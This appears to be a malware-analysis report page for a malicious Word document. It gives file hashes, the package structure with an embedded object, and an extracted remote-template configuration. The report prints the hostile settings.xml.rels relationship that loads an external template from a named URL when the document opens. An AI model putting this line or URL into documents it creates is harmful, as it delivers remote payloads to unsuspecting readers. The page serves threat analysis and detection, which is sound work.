General
Structural Analysis
Config.1
Yara Rules9
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 828cfd8f73c40445cd3f6587729da514
|
| Sha1 | b7eb2ade1107c0fdf2f4a933eaa8f865896d0c3a
|
| Sha256 | f934b28bb323edd41edecc32c7f9acc2f24614688758a27f92bd40f63deffc7a
|
| Sha384 | 0bc2eb912a3d566a6fd32106f11cd0c6eb9892a38198cf64c601f1f0d12774c2a98507be1b7e240de22d0e0f148c1af6
|
| Sha512 | 02c0739601694c6efbfac805aa9b5acd0d4904a83ef3ff2acb44bb4de1cf3fd63370edf6daf9fdffa3e6c49a46a56242fa50716068a6d46b0e3f142f67b49413
|
| SSDeep | 6144:vprNVxQ2CjOwmQCveoScrMn1pBbhRWnCkh6xw6h7nlSjY5YqcvT:hrNchCvvBrQhFoi7EIwT
|
| TLSH | D554239E57B814BCCB2B0FBD73C8421DE2D04A8D6567CE4B3A221ADCF31866A4583775
|
File Structure
828cfd8f73c40445cd3f6587729da514
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
footer2.xml.rels
document.xml
footnotes.xml
footer3.xml
footer2.xml
header3.xml
endnotes.xml
embeddings
Malicious
Root Entry
Malicious
ObjInfo
[Content_Types].xml
_rels
.rels
xl
_rels
workbook.xml.rels
workbook.xml
worksheets
theme
theme1.xml
styles.xml
sharedStrings.xml
calcChain.xml
printerSettings
printerSettings1.bin
media
image1.emf
theme
theme1.xml
settings.xml
webSettings.xml
fontTable.xml
styles.xml
Malware Configuration - Remote Template
|
Config. Field0 | Value |
|---|---|
| Target | https://getabre.com/xnjCQL |
| Path | settings.xml.rels |
| XPath | /Relationships/Relationship |
| Outer XML | <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://getabre.com/xnjCQL" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" /> |
Artefacts
|
Name0 | Value |
|---|---|
| Remote Template - Highly Suspicious | https://getabre.com/xnjCQL |
828cfd8f73c40445cd3f6587729da514 (293.97 KB)
File Structure
828cfd8f73c40445cd3f6587729da514
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
footer2.xml.rels
document.xml
footnotes.xml
footer3.xml
footer2.xml
header3.xml
endnotes.xml
embeddings
Malicious
Root Entry
Malicious
ObjInfo
[Content_Types].xml
_rels
.rels
xl
_rels
workbook.xml.rels
workbook.xml
worksheets
theme
theme1.xml
styles.xml
sharedStrings.xml
calcChain.xml
printerSettings
printerSettings1.bin
media
image1.emf
theme
theme1.xml
settings.xml
webSettings.xml
fontTable.xml
styles.xml
Characteristics
Malware Configuration - Remote Template
|
Config. Field0 | Value |
|---|---|
| Target | https://getabre.com/xnjCQL |
| Path | settings.xml.rels |
| XPath | /Relationships/Relationship |
| Outer XML | <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://getabre.com/xnjCQL" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" /> |
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| Remote Template - Highly Suspicious | https://getabre.com/xnjCQL Malicious |
828cfd8f73c40445cd3f6587729da514 > word > _rels > settings.xml.rels |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.